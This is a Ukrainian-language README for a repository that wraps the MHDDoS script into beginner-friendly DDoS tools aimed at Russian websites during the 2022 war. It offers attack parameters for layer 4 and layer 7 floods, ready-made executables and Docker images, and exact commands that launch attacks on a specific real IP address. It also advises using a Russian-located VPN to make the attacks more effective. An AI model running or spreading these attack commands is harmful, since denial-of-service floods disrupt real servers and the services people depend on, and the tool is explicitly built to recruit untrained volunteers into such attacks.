Паляниця
Цифрова зброя проти xуйлoвської пропаганди.
Щоб негайно почати шкварити рашистські сайти – мерщій у швидкий старт!
А коли ворожі сервери вже жаряться і є час почитати – ласкаво просимо вниз.
Швидкі посилання
🔥
Мотивація
24-го лютого 2022 року Російська Федерація підступно напала на Україну. В перші дні нападу Мінцифри України оперативно організувало кібер-армію: легіон IT-фахівців та волонтерів, які доклали свої сили та вміння на протидію рашистському агресору у цифровому просторі.
Цей репозиторій – духовний спадкоємець декількох проектів, що допомагали нам тримати цифровий тиск по ворогу у перший тиждень війни. Наша ціль – зробити запуск цього коду якомога простішим для більшості людей і при тому зберегти ефективність і гнучкість опцій атаки.
Тож, вмикайте свої машини, відкривайте термінали, і вліпимо дружньою паляницею по системах окупантів!
Слава Україні! Ми разом і ми переможемо!
🔧
Технічні деталі
MHDDoS – це потужний пайтон-скрипт для виконання DDoS атак у різних режимах. Наш репозиторій надає для нього два прості врапери:
- Пиріжок (pyrizhok) – мінімалістична версія врапера, яка потребує лише адресу цілі для того, щоб запустити атаку. Тим паче, за бажанням можна надати інший порт і протокол. Створений для починаючих котиків
😸 - Паляниця (palyanytsya) – це повний врапер для MHDDoS, який приймає всі опції з оригінального скрипта. Створений для досвідчених в IT котів та киць
😼
📑
Параметри
⚠ ВАЖЛИВО: Не забувайте користуватися VPN! Бажано з локацією в Росії - так ефективніше.
Пиріжок можна запускати без параметрів – під час запуску він сам спитає вас про те, кому і як треба вгатити.
Тим не менш, параметри можна передати наперед у такому форматі:
pyrizhok.py <target_address> <target_port> <attack_method>
Значення параметрів:
target_address
– адреса цілі. Може бути URL або IP-адресою.target_port
– (опціонально) порт цілі.attack_method
– (опціонально, потребує вказаний порт) метод, який буде використовуватися для атаки. Список можливих опцій можна побачити в оригінальному доці MHDDoS.
Паляниця дає доступ до всіх опцій в MHDDoS, яких немало, тому зараз рекомендуємо дивитися прямо в оригінальну документацію. Також деталі про параметри можна подивитися запустивши паляницю з параметром help:
palyanytsya.py help
Мапа параметрів залежить від того, на який шар мережі ведеться атака.
- Layer 7:
palyanytsya.py <method> <url> <socks_type5.4.1> <threads> <proxylist> <rpc> <duration>
- Layer 4:
palyanytsya.py <method> <ip:port> <threads> <duration>
🍞
Випічка
Паляниця та пиріжок запаковані в декілька різних форматів, аби зменшити час на налаштування і запуск до мінімуму.
ℹ Детальний гайд про те, як самостійно запекти пиріжок та паляницю можна знайти тут.
PyInstaller
-
💻 Білди .exe для Windows – в executables/Windows. -
🐧 Білди для Linux – в executables/Linux. -
🍎 Білди для Mac – в executables/Mac (Intel) та executables/Mac (M1).
Docker
- ghcr.io/pocket-sunflower/pyrizhok:latest
- ghcr.io/pocket-sunflower/palyanytsya:latest
Якщо хочете створити білди самостійно – ласкаво просимо в детальний гайд.
🥡
Запуск вихідного коду
Щоби запустити пиріжок чи паляницю з джерела на Linux:
ℹ️ Детальніші інструкції про те, як запустити програму з вихідного коду можна знайти тут.
-
Клонуємо цей репозиторій та заходимо в папку з кодом:
git clone https://github.com/pocket-sunflower/palyanytsya cd palyanytsya
-
Створюємо віртуальне середовище та активуємо його:
⚠ Паляниця з пиріжком потребують версію Python не менше ніж 3.10.2.python3 -m virtualenv --python python3.10 venv source venv/bin/activate
-
Встановлюємо залежності:
pip install -r requirements.txt
-
Запускаємо пиріжок (або паляничку) з потрібною адресою, наприклад 194.85.30.210 (саме так):
python3 pyrizhok.py 194.85.30.210 443 TCP
python3 palyanytsya.py bypass 194.85.30.210 5 100 socks5.txt 10000 3600
…і те, що за адресою, відправляється вслєд за рускім корабльом.
Щоби дізнатися, я запускати пиріжок та паляницю на кожній з доступних платформ, ласкаво просимо в детальніший гайд.
🚀
Плани та колаборація
Найближчим часом планується:
-
✅ Додати кращий логінг статусу атаки (наразі атака іде у фоновому режимі, без індикації статусу). -
✅ Додати автоматизацію білдів для усіх платформ через CI. - Додати логінг досяжності та статусу цілі.
- Додати новий клієнт для автоматичного «тестування» адрес наданих проектом «Death by 1000 needles». Це допоможе нам бути більш скоординованими та ефективними.
- Whatever else may come…
Якщо ви можете допомогти з будь-яким пунктом вище, або у вас є ідеї про те, як покращити існуючий код, ми будемо дуже вдячні - відкривайте issues та пропонуйте pull requests. Єдина умова - чітко поясніть, що ви хотіли би змінити, щоб ніхто не витрачав часу на непорозуміння.